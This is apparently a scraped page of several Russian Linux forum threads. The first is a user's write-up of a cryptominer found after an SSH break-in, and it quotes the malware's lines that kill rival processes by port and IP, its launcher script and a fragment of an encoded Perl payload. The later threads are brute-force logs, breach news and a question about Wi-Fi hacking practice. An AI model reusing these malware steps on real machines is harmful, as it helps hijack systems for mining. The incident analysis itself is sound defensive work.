	netstat -anp | grep :23 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :143 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :2222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :3389 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :6665 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :6667 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :8444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep 138.199.40.233:9137 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
	netstat -anp | grep 185.150.117.29 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9

И только восле всех приготовлений, когда оно готово единолично майнить оно себя запускает

#!/bin/bash
./stop
./init0
sleep 10
pwd > dir.dir
dir=$(cat dir.dir)
ARCH=`uname -m`
	if [ "$ARCH" == "i686" ]; then
		nohup ./anacron >>/dev/null & 
	elif [ "$ARCH" == "x86_64" ];   then
		./kswapd0
	fi
echo $! > bash.pid

К слову ./anacron у меня небыло.

Ещё оно содержит base64 строку которая декодируясь отдаётся в perl

eval unpack u=>q{_(R`@("`@("`@("`M($%D:6-I;VYA9&\@8V]M8 и так далее в этом виде дохрена перлоты

Всё. Я спать.

UPDATE3 АААААААААААААААААААААААААААААААААААААААААА

Я встал, а вдруг меня брутфорснули, короче смотрю сюда grep -in Accept /var/log/auth.log

И Уоооооооооопааааааанааааа

... 
25515:Sep 13 00:03:55 gnu sshd[250080]: Accepted password for gogs from 222.232.242.116 port 56529 ssh2
...

Чиииииииииииивоооооооооооооооо? Каким хером? Ай пи 222.232.242.116 South Korea🇰🇷 Seoul Seoul

Как оно пробралось? Вернее как он с внешнего ip ко мне в локалхост пришёл? Яж за провайдером? Или тут gogs мог подсобить туннель организовав? Я нихера не понял.

Судя по времени 00:03:55 коннект по ssh был до создания файлов 00∶31∶38.

UPDATE4: https://savepearlharbor.com/?p=296720

Я не первый https://savepearlharbor.com/?p=296720 GOGS тут походу не причём, меня просто каким то хером с внешнего ip хотя у меня мой динамический подконектились к моему пк. Лол.

Как? Я не догоняю и очень хочу спать. Оборудование провайдера похакано и оно во внутренней сети брутфорсит? Отпишите. А мне насрать я точно рпять спать. вСё.

 , , , ,

LINUX-ORG-RU ()

Что будет 3а исполь3ование интернета не платя?

Как-то припо3днился с оплатой и смог 3айти в интернет прям сейчас 3ашел и пишу сюда

Перемещено shell-script из general

 , ,

bad_master ()

Посоветуйте линукс пожалуйста. У меня был убунту и лубунту и какой-то который платный и похож на мак помоему Elementary OS

Убунту - нет. Думала про кали, хочу попрактиковаться в кибербезопасности. Какой лучше использовать для таких целей(типа взлом вайфай итд). Спасибо! Если кроме функционала будет хороший дизайнв вообще супер, очень нравился елементари, но он помоему теперь платный

 ,

katemisik ()

CD Projekt взломали — хакеры получили исходный код игр и внутренние документы компании

Корпорация CD Projekt объявила о взломе её систем. Это не затронуло работу пользовательских сервисов, но, похоже, хакеры получили доступ к исходному коду Cyberpunk 2077, The Witcher 3: Wild Hunt, Gwent и не вышедшей сборке The Witcher 3: Wild Hunt (вероятно, которая разрабатывается для ПК, PlayStation 5, Xbox Series X и S).

Как думаете, стоит ли ждать порт Cyberpunk 2077 на онтопик?

Источник

 , , , ,

xwicked ()

Дятлы долбят ssh

Привет всем, у меня тут проблемма, какой-то дятел уже пятый час долбит ssh c нескольких ip-шников. Как мне от него избавится. Вот пример лога.


Jan 08 15:33:15 skyhost-vds-22235 sshd[12820]: Received disconnect from 103.105.130.136 port 47100:11: Bye Bye [preauth] Jan 08 15:33:15 skyhost-vds-22235 sshd[12820]: Disconnected from authenticating user root 103.105.130.136 port 47100 [preauth] Jan 08 15:33:20 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=33:33:00:00:00:01:fa:16:3e:06:88:6c:86:dd SRC=fe80:0000:0000:0000:> Jan 08 15:33:20 skyhost-vds-22235 sshd[12827]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=21> Jan 08 15:33:21 skyhost-vds-22235 sshd[12825]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=19> Jan 08 15:33:22 skyhost-vds-22235 sshd[12827]: Failed password for root from 217.29.126.136 port 37656 ssh2 Jan 08 15:33:23 skyhost-vds-22235 sshd[12825]: Failed password for root from 193.187.119.69 port 53402 ssh2 Jan 08 15:33:23 skyhost-vds-22235 sshd[12827]: Received disconnect from 217.29.126.136 port 37656:11: Bye Bye [preauth] Jan 08 15:33:23 skyhost-vds-22235 sshd[12827]: Disconnected from authenticating user root 217.29.126.136 port 37656 [preauth] Jan 08 15:33:24 skyhost-vds-22235 sshd[12825]: Received disconnect from 193.187.119.69 port 53402:11: Bye Bye [preauth] Jan 08 15:33:24 skyhost-vds-22235 sshd[12825]: Disconnected from authenticating user root 193.187.119.69 port 53402 [preauth] Jan 08 15:33:38 skyhost-vds-22235 sshd[12829]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=12> Jan 08 15:33:40 skyhost-vds-22235 sshd[12829]: Failed password for root from 120.31.131.172 port 58772 ssh2 Jan 08 15:33:41 skyhost-vds-22235 sshd[12829]: Received disconnect from 120.31.131.172 port 58772:11: Bye Bye [preauth] Jan 08 15:33:41 skyhost-vds-22235 sshd[12829]: Disconnected from authenticating user root 120.31.131.172 port 58772 [preauth] Jan 08 15:33:48 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=fa:16:3e:7f:b9:98:00:07:7d:63:f9:bf:08:00 SRC=195.54.160.155 DST=1> Jan 08 15:33:54 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=fa:16:3e:7f:b9:98:00:07:7d:63:f9:bf:08:00 SRC=92.63.197.83 DST=193> Jan 08 15:34:08 skyhost-vds-22235 sshd[12833]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=13> Jan 08 15:34:09 skyhost-vds-22235 sshd[12833]: Failed password for root from 139.155.2.6 port 48872 ssh2 Jan 08 15:34:11 skyhost-vds-22235 sshd[12833]: Received disconnect from 139.155.2.6 port 48872:11: Bye Bye [preauth] Jan 08 15:34:11 skyhost-vds-22235 sshd[12833]: Disconnected from authenticating user root 139.155.2.6 port 48872 [preauth] Jan 08 15:34:15 skyhost-vds-22235 sshd[12835]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22> Jan 08 15:34:15 skyhost-vds-22235 sshd[12837]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=19> Jan 08 15:34:16 skyhost-vds-22235 sshd[12835]: Failed password for root from 222.239.124.19 port 42240 ssh2 Jan 08 15:34:16 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=fa:16:3e:7f:b9:98:00:07:7d:63:f9:bf:08:00 SRC=193.57.40.20 DST=193> Jan 08 15:34:17 skyhost-vds-22235 sshd[12837]: Failed password for root from 193.187.119.69 port 39978 ssh2 Jan 08 15:34:18 skyhost-vds-22235 sshd[12835]: Received disconnect from 222.239.124.19 port 42240:11: Bye Bye [preauth] Jan 08 15:34:18 skyhost-vds-22235 sshd[12835]: Disconnected from authenticating user root 222.239.124.19 port 42240 [preauth] Jan 08 15:34:18 skyhost-vds-22235 sshd[12837]: Received disconnect from 193.187.119.69 port 39978:11: Bye Bye [preauth] Jan 08 15:34:18 skyhost-vds-22235 sshd[12837]: Disconnected from authenticating user root 193.187.119.69 port 39978 [preauth] Jan 08 15:34:19 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=33:33:00:00:00:01:fa:16:3e:06:88:6c:86:dd SRC=fe80:0000:0000:0000:> Jan 08 15:34:34 skyhost-vds-22235 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=fa:16:3e:7f:b9:98:00:07:7d:63:f9:bf:08:00 SRC=192.241.222.118 DST=> Jan 08 15:34:55 skyhost-vds-22235 sshd[12840]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22> Jan 08 15:34:57 skyhost-vds-22235 sshd[12840]: Failed password for root from 221.181.185.198 port 27634 ssh2 Jan 08 15:34:59 skyhost-vds-22235 sshd[12840]: Failed password for root from 221.181.185.198 port 27634 ssh2 Jan 08 15:35:01 skyhost-vds-22235 sshd[12844]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=18> Jan 08 15:35:01 skyhost-vds-22235 CRON[12846]: pam_unix(cron:session): session opened for user root by (uid=0) Jan 08 15:35:01 skyhost-vds-22235 CRON[12847]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1) Jan 08 15:35:01 skyhost-vds-22235 CRON[12846]: pam_unix(cron:session): session closed for user root Jan 08 15:35:01 skyhost-vds-22235 sshd[12840]: Failed password for root from 221.181.185.198 port 27634 ssh2 Jan 08 15:35:02 skyhost-vds-22235 sshd[12840]: Received disconnect from 221.181.185.198 port 27634:11: [preauth] Jan 08 15:35:02 skyhost-vds-22235 sshd[12840]: Disconnected from authenticating user root 221.181.185.198 port 27634 [preauth] Jan 08 15:35:02 skyhost-vds-22235 sshd[12840]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.181.185> Jan 08 15:35:03 skyhost-vds-22235 sshd[12844]: Failed password for root from 181.49.50.202 port 47894 ssh2 Jan 08 15:35:04 skyhost-vds-22235 sshd[12844]: Received disconnect from 181.49.50.202 port 47894:11: Bye Bye [preauth] Jan 08 15:35:04 skyhost-vds-22235 sshd[12844]: Disconnected from authenticating user root 181.49.50.202 port 47894 [preauth] Jan 08 15:35:04 skyhost-vds-22235 sshd[12849]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22> Jan 08 15:35:06 skyhost-vds-22235 sshd[12842]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=11> Jan 08 15:35:06 skyhost-vds-22235 sshd[12849]: Failed password for root from 221.181.185.198 port 35303 ssh2 Jan 08 15:35:08 skyhost-vds-22235 sshd[12842]: Failed password for root from 116.1.149.196 port 33042 ssh2 lines 1017-1067/1067 (END)

 ,

sever99 ()

Логирование BrainyCp Как защитить себя от взлома

Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:34 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:35 localhost named[2001]: client @0x7f0bd00cc950 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00cc950 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd0027ae0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 160.219.36.82#53 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) ‘sl/ANY/IN’ denied Dec 30 14:43:36 localhost named[2001]: client @0x7f0bd00264f0 89.18.175.12#5060 (sl): query (cache) 